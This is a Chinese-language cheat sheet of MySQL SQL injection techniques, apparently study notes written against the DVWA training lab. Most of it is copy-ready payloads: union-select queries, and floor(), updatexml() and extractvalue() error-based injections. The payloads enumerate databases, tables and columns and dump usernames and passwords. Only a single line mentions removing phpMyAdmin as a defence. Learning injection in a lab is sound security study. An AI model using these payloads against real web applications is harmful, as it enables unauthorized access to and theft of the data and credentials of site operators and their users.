常识:
phpstudy环境下的mysql数据库默认会有phpmyadmin的网页化数据库管理工具。
只要知道数据库的账号密码,找到注入点,就可以在网页调用phpmyadmin,直接图形化的查阅该库所有信息,被很多网站管理员忽视。
可以安装mysql数据库后,直接删除phpmyadmin工具。
知道数据库密码的前提下更改密码。
不知道数据库密码的前提下更改密码。
导入数据库、导出数据库。
基操:
1.select schema_name from information_schema.schemata;//查看所有数据库
2.show databases;//查看所有数据库
3.select database();//查看当前数据库
4.select table_name from information_schema.tables where table_schema='dvwa';//查看数据库dvwa的所有表
5.select column_name from information_schema.columns where table_schema='dvwa' and table_name='users';//查看数据库dvwa中users表的所有字段
6.select user,password from dvwa.users;//查看用户名和密码的内容
注意:''内的内容有时需要转换为hex,也就是ascii十六进制,可以使用burpsuite的decode进行转换
order by和union select使用:
1.select user_id,user,password from dvwa.users order by 1;//按照第几列进行排序,间接判断表的列数
2.select user_id,user,password from dvwa.users where user_id=1 union select 1,2,3;//使用联合查询使其合并回显
将联合查询前的语句改为逻辑错误即可只回显联合查询结果:
3.select user_id,user,password from dvwa.users where user_id=-1 union select 1,2,3;
4.select user_id,user,password from dvwa.users where user_id=1 and 1=2 union select 1,2,3;
limit 0,1//第一行的第一个值
limit 1,1//第二行的第一个值
注入点很少的时候可以使用联合查询一起拼接输出:
1.select concat(user,password) from dvwa.users;//无间隔符拼接多列结果
2.select concat_ws(0x7e,user,password) from dvwa.users;//有间隔符拼接多列结果
3.select group_concat(user,0x3a,password) from dvwa.users;//拼接多行结果为一行,每行以逗号结尾
4.select concat_ws(0x7e,@@hostname,@@datadir,@@version_compile_os);//查看主机名称、数据库路径、操作系统版本
5.select @@version; select version(); //查看数据库版本的2种命令
mysql报错注入常用函数:
floor,理解写篇文章
extractvalue
updatexml
floor()报错注入语句格式:
格式一:
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,user(),0x3a,database()))) x from information_schema.schemata group by x)a)-- //爆库
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,schema_name) from information_schema.schemata limit 0,1)) x from information_schema.schemata group by x)a)-- //爆库
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x)a)-- //爆表
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,column_name) from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)) x from information_schema.schemata group by x)a)-- //爆字段
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,first_name) from dvwa.users limit 0,1)) x from information_schema.schemata group by x)a)-- //爆字段
格式二:
and (select 1 from(select count(*),concat((select (select (select concat(0x7e,payload[],0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1' And (select 1 from (select count(*),concat((select (select concat (user(),0x3a,database()))),floor(rand(0)*2))x from information_schema.columns group by x)a) -- 爆库
1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,schema_name,0x7e))) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- //爆库
1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- //爆表
1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- //爆字段
1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,first_name,0x7e))) from dvwa.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- //爆内容
格式三:
id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x -- ; 爆数据库
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x; 爆表名
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x-- ; 爆字段
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x-- 爆内容
xmdateXML报错注入
1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1) -- //爆数据库信息
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- //爆当前数据库表信息
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) -- //爆users表字段信息
1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x3a,last_name) from dvwa.users),0x7e),1) -- //爆数据库内容
extractvalue()函数报错注入
1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) -- //爆数据库信息
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) -- //爆当前数据库表信息
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e)) -- //爆users表字段信息
1' and extractvalue(1,concat(0x7e,(select group_concat(first_name,0x3a,last_name) from dvwa.users),0x7e)) -- //爆数据库内容